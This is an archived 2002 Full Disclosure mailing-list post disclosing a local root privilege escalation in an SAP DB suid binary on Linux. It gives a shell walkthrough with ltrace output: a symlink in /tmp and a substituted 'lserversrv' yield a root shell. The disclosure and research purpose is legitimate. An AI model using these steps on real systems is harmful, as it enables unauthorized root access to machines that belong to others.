Home page logo

fulldisclosure logo Full Disclosure mailing list archives

SAP database local root via symlink
From: KF <dotslash () snosoft com>
Date: Wed, 04 Dec 2002 09:57:30 -0500

Hey folks,
During an evaluation of the SAP database for linux I located a security issue in one of their suid binaries. This issue is a symlink attack against a binary that makes an execve call to a file in your current directory. The details of this issue are outlined below. You should be able to exploit this by hand however I included a simple exploit.

The alert from SAP is located here:

This code and alert will be added to http://www.snosoft.com/research



Attachment: SAProot.sh

This local attack upon SAP is based on sapdb-server-linux-32bit-i386-7_3_0_29.tgz
it is currently unknown if this affects other SAP flavors. 

[elguapo () rh8 pgm]$ pwd

[elguapo () rh8 pgm]$ ls -al lserver
-rwsrwxr-x    1 root     sapdb       15673 Oct 22 10:42 lserver

Using ltrace we can see an attempt to run ./lserversrv via execve()

[elguapo () rh8 pgm]$ ltrace ./lserver
__libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c <unfinished ...>
__register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5, 0x4212a2d0) = 0
malloc(10)                                        = 0x0804a200
strcpy(0x0804a200, "./lserver")                   = 0x0804a200
execv("./lserversrv", 0xbffff994 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

The problem with this execve call is that when looking for "./lserversrv" the lserver 
does not check for any symlinks. The abuser can very easily make his own lserversrv.

We are just going to make a directory in /tmp to use for scratch space
[elguapo () rh8 pgm]$ cd /tmp
[elguapo () rh8 tmp]$ mkdir "snosoft+sapdb=root"
[elguapo () rh8 tmp]$ cd "snosoft+sapdb=root"

Next we make a symlink to the suid binary lserver 
[elguapo () rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver

As we saw above lserver trys to do the following:
execv("./lserversrv", 0xbffff994 <unfinished ...>

This is easy enough to take advantage of... 
[elguapo () rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv

As you can see we have the euid of root at this point in time...
[elguapo () rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)

Finishing up the task is trivial from there... 
[elguapo () rh8 snosoft+sapdb=root]$ cat > root.c

[elguapo () rh8 snosoft+sapdb=root]$ cc -o root root.c

[elguapo () rh8 snosoft+sapdb=root]$ cp root lserversrv

[elguapo () rh8 snosoft+sapdb=root]$ ./lserver
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(elguapo)

Copyright SNOSoft Inc. 2002 

  By Date           By Thread  

Current thread:
  • SAP database local root via symlink KF (Dec 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]